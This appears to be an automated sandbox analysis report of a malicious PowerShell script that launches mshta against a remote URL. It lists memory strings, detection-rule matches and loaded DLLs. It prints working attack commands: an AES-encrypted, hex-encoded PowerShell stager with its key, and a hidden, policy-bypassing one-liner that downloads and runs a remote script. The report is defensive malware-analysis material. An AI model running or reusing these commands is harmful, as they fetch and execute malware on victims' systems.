Source: mshta.exe, 00000002.00000003.1779641762.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1782599751.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1793135818.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1806411558.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783270231.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1784469451.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp46
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4:
Source: mshta.exe, 00000002.00000002.1799903969.000001C19C7F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4C:
Source: mshta.exe, 00000002.00000002.1800072120.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4E
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1804268352.000001C19E1D0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4H
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4O
Source: mshta.exe, 00000002.00000002.1799754505.000001C19C7D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4ROFILE_STRING=I
Source: mshta.exe, 00000002.00000002.1807186379.000001C9A4130000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4S
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4T
Source: mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4TTC:
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4d4LMEMp
Source: mshta.exe, 00000002.00000002.1799903969.000001C19C7FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4fE
Source: mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4https://pawpaws.readit-carfanatics.com/madonna.mp4
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4i
Source: mshta.exe, 00000002.00000002.1805106055.000001C99EA60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4ic
Source: mshta.exe, 00000002.00000003.1779854987.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1793336898.000001C99EB18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792624686.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1805508732.000001C99EB19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4mLMEMh
Source: mshta.exe, 00000002.00000002.1799903969.000001C19C7FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4oG
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4rC:
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4w
Source: mshta.exe, 00000002.00000003.1788000132.000001C9A3BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4x
Source: powershell.exe, 00000006.00000002.1790101993.00000000098F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws1.readit-carfanatic
Source: powershell.exe, 00000006.00000002.1790101993.00000000096F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1790101993.0000000009421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws1.readit-carfanatics.com
Source: powershell.exe, 00000006.00000002.1769565150.00000000032E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws1.readit-carfanatics.com/madonna.vstx
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 172.67.201.143:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.201.143:443 -> 192.168.2.4:49734 version: TLS 1.2

System Summary

Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Process created: Commandline size = 2518
Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal80.evad.winPS1@11/14@2/2
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gqsu1bu.3z3.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD714
0682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: imgutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
